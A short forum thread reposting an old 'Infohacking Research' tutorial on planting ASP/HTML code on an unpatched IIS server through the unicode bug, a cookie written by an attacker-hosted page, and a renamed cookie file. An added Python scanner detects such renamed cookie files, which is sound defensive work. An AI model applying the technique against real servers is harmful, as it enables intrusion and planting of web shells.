Cookie Code Injection



-=Player=-
14.10.2007, 12:12
Scenario : An IIS with the unicode bug is protected with a fascist firewall that only allows
outbound connections from a Proxy. There is no way to open direct connections from the IIS
to the Internet. But there is a Proxy, and probably the IE of the IIS box is configured to
use that proxy...You only have to launch an IE :

http://vulnerable_target/<unicode_string>/<path_to_IE>/<IP_of_your_server>/evil_cookie.html

What is evil_cookie.html ?

An html page that writes a cookie on the IIS vulnerable box.
How can you inject code there ?
On "document.cookie" function, you can use the variable that sets the cookie name to put
your code...

document.cookie = "<HERE_I_WRITE_MY_CODE>" + ....

This code can be an html, asp, ... a nice form to upload files ?

There are some limitations on what you can put on your cookie injected code...

1) Be careful with special characters " ; and others ( we let you play with it )
2) 4 k is max size for a cookie... ;-)

After page has been loaded by the IIS, you have to find the cookie...
Usually cookies are stored on user's profile directory, but remember you are launching IE as
the IIS user ... ;-) , so cookie is stored on other place... Find yourself !
Rename the cookie to .html, .asp, and put it on a visible directory of the server.
Then you have your nice-evil page waiting for you.


Note : we know there are better ways to upload files to the server, this is only a different
way to do it, and a way to show how dangerous cookies can be, yes, those little, only text
files ...


Infohacking Research 2002
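
Added example, not part of the original post or of the Infohacking text: a defender-side check for the artifact the post describes, a cookie file renamed to .html/.asp and left in a served directory. It assumes the classic Internet Explorer text cookie layout (nine-line records ending in `*`); the extension list, size limit and sample files are constructed for illustration.

```python
import os
import re
import tempfile

# Extensions the web server would serve or execute; adjust per site (assumption).
SERVED_EXTS = {".html", ".htm", ".asp", ".asa", ".aspx", ".php"}
DIGITS = re.compile(r"^\d+$")

def looks_like_ie_cookie(text):
    """True if text is made only of IE-style cookie records, 9 lines each:
    name, value, domain/path, flags, four numeric timestamp words, '*'."""
    lines = text.replace("\r\n", "\n").rstrip("\n").split("\n")
    if len(lines) % 9 != 0:
        return False
    for i in range(0, len(lines), 9):
        rec = lines[i:i + 9]
        if rec[8] != "*" or "/" not in rec[2]:
            return False
        if not all(DIGITS.match(field) for field in rec[3:8]):
            return False
    return True

def scan_webroot(root):
    """Return paths under root that have a served extension but cookie-file structure."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SERVED_EXTS:
                continue
            path = os.path.join(dirpath, name)
            if os.path.getsize(path) > 64 * 1024:  # cookie files are small
                continue
            with open(path, "r", encoding="latin-1") as fh:
                if looks_like_ie_cookie(fh.read()):
                    hits.append(path)
    return sorted(hits)

def demo():
    """Constructed web root: one benign page, one renamed cookie, one unserved copy."""
    cookie = "<b>marker</b>\nv\nexample.invalid/\n1024\n1\n2\n3\n4\n*\n"
    root = tempfile.mkdtemp()
    for name, body in (("index.html", "<html><body>ok</body></html>\n"),
                       ("up.asp", cookie), ("notes.txt", cookie)):
        with open(os.path.join(root, name), "w", encoding="latin-1") as fh:
            fh.write(body)
    return [os.path.basename(p) for p in scan_webroot(root)]

if __name__ == "__main__":
    print(demo())
```

A hit is a lead for review rather than proof: check the file's owner and creation time against the web server account's activity.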

Blutonium
14.10.2007, 12:31
nice tut..
It would be better if you posted it in German right away, though ;-)

-=Player=-
14.10.2007, 12:33
Why me?
Don't you know English?